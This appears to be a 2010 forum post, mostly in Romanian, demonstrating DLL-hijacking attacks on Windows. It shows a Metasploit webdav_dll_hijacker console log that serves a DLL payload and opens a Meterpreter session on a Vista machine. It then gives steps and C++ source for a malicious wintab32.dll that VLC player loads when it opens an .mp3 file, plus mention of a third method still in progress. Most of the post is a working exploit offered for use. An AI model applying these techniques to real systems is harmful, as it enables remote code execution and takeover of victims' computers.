<snip> [*] PROPFIND /documents/ [*] PROPFIND => 207 Directory (/documents/) [*] PROPFIND => 207 Top-Level Directory [*] PROPFIND /documents/policy.pgp [*] PROPFIND => 207 File (/documents/policy.pgp) [*] PROPFIND /documents/credssp.dll [*] PROPFIND => 207 File (/documents/credssp.dll) [*] PROPFIND / [*] PROPFIND => 207 Directory (/) [*] PROPFIND => 207 Top-Level Directory [*] GET => DLL Payload [*] PROPFIND /DOCUMENTS [*] PROPFIND => 301 (/DOCUMENTS) [*] PROPFIND /DOCUMENTS/ [*] PROPFIND => 207 Directory (/DOCUMENTS/) [*] PROPFIND => 207 Top-Level Directory [*] PROPFIND /documents/rundll32.exe [*] PROPFIND => 404 (/documents/rundll32.exe) [*] Sending stage (748544 bytes) to [*] Meterpreter session 1 opened ( -> at Sun Aug 29 20:40:27 +0200 2010 msf exploit(webdav_dll_hijacker) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: neox-Vista\neox si mai sint doua modalitati una ii de exemplu vclplayer cum descrie pe exploitdb codat in ollydbg Place a .mp3 file and wintab32.dll in same folder and execute .mp3 file in vlc player. Code for wintab32.dll: /*----------*/ /* wintab32.cpp */ #include "stdafx.h" #include "dragon.h" void init() { MessageBox(NULL,"Pwned", "Pwned!",0x00000003); } BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: init();break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } /*----------*/ la asta fac eu un video cint am timp si a treia modalitate lucrez deocamdata la ia ....
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